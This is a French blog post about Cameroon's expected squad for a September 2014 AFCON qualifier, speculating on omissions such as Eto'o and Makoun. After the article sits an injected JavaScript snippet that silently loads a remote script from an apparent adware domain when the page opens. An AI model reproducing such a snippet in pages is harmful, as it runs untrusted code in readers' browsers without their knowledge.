Overblog Suivre ce blog
Editer l'article Administration Créer mon blog
20 août 2014 3 20 /08 /août /2014 01:23

Les Lions Indomptables affrontent les Léopards de la République démocratique du Congo le 6 septembre prochain à Kinshasa, à l’occasion de la première journée de la phase aller des éliminatoires de la Coupe d’Afrique des nations (Can) de Maroc 2015. Et alors que l’on annonce imminente, la pub174837984.jpglication de la liste des joueurs retenus par l’entraîneur-sélectionneur du Cameroun, Volker Finke pour préparer cette rencontre, des sources généralement bien informées laissent entendre que les noms de Samuel Eto’o, Jean II Makoun et Stephane Mbia pourraient manquer à l’appel.

S’attendre à des surprises fracassantes ?

Au lendemain d’une Coupe du monde catastrophique soldée par une élimination précoce au premier tour pour trois défaites, 9 buts encaissés et un but inscrit avec en prime la dernière place au classement, la liste du tacticien allemand ne devrait pas beaucoup ressembler à celle qu’il avait dressée en marge de ce Mondial de 2014. « Cette fois-ci, il faudra s’attendre à de grandes surprises », confie une source proche de l’encadrement technique des Lions.

Plusieurs joueurs auraient été mis à l’écart. Parmi les noms qui devraient sortir du chapeau, les plus évoqués sont ceux du capitaine, Samuel Eto’o, Jean II Makoun en plus de la suspension d’Alexandre Song. Si Makoun a tout fait pour aller au Brésil alors qu’il était blessé, Eto’o n’a pas vraiment aidé la sélection, tandis que Song a (presque) été à l’origine de la défaite 0-4 des Lions face à la Croatie, en écopant d’un carton rouge stupide lors de ce match.

Henri Bédimo, actuellement blessé ne devrait également pas être convoqué par Volker Finke. Idem pour Jean-Armel Kana-Biyik qui, lui, a pris sa retraite internationale il y a plus de deux mois.

Des joueurs sous pression

Si certains joueurs en grande forme comme Vincent Aboubakar, déjà auteur d’un but en deux matchs de Ligue 1 de France cette saison, Eric-Maxim Choupo-Moting, Benjamin Moukandjo, Nicolas Nkoulou ou Joël Matip ne devraient pas s’en faire, d’autres par contre vont attendre la liste avec pression en espérant y voir leurs noms. C’est le cas des joueurs tels que Landry Nguémo sans club, Benoît Assou-Ekotto dont Tottenham ne veut plus, Dany Nounkeu, Sammy Ndjock, Enoh Eyong et Aurélien Chedjou. En difficulté lors de la saison dernière, ces joueurs ne sont pas assurés de disputer des matchs cette saison avec leurs clubs respectifs.

C’est également dans ce cas de figure que l’on verra si Stéphane Mbia peut se relancer. Auteur d’un Mondial « passable » et d’une belle saison avec Séville où il a remporté la Ligue Europa, Mbia est actuellement libre de tout contrat. Une convocation en sélection nationale est à douter puisque le joueur ne doit pas être en forme suffisante pour pouvoir livrer un match de cette envergure.

Parmi ceux dont on attend avec impatience de voir s’ils seront encore convoqués, citons les cas des joueurs de Coton Sport de Garoua : le gardien Loïc Feudjou et le défenseur latéral, Cédric Djeugoue. Les deux joueurs étaient les seuls locaux camerounais au Mondial. Finke va-t-il encore leur faire confiance ? C’est possible. Au moment où les championnats européens n’ont même pas encore tous débuté, l’on se demande bien sur quelle base le technicien allemand qui aurait fait de la supervision en ces terres lointaines, a dressé sa liste.

 (function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})(); 

Partager cet article

Repost 0
Published by EBOULE SAMUEL - dans LIONS INDOMPTABLES
commenter cet article

commentaires

Présentation

  • : camerounstar
  • camerounstar
  • : ICI POUR PUBLIER TOUS SUR LES ACTUALITES DES STARS CAMEROUNAIS (E) SANS EXCEPTION. N'EXISTE PAS A T'ABONNER
  • Contact

Profil

  • EBOULE SAMUEL
  • JEUNE CAMEROUNAIS INNOVANTEUR DE LA CULTURE
CAMEROUNAISE.
EBOULE SAMUEL EST MON NOM ET TU PEUX ME RETROUVER SUR FACEBOOK GRACE A CE NOM.
  • JEUNE CAMEROUNAIS INNOVANTEUR DE LA CULTURE CAMEROUNAISE. EBOULE SAMUEL EST MON NOM ET TU PEUX ME RETROUVER SUR FACEBOOK GRACE A CE NOM.

Recherche

Liens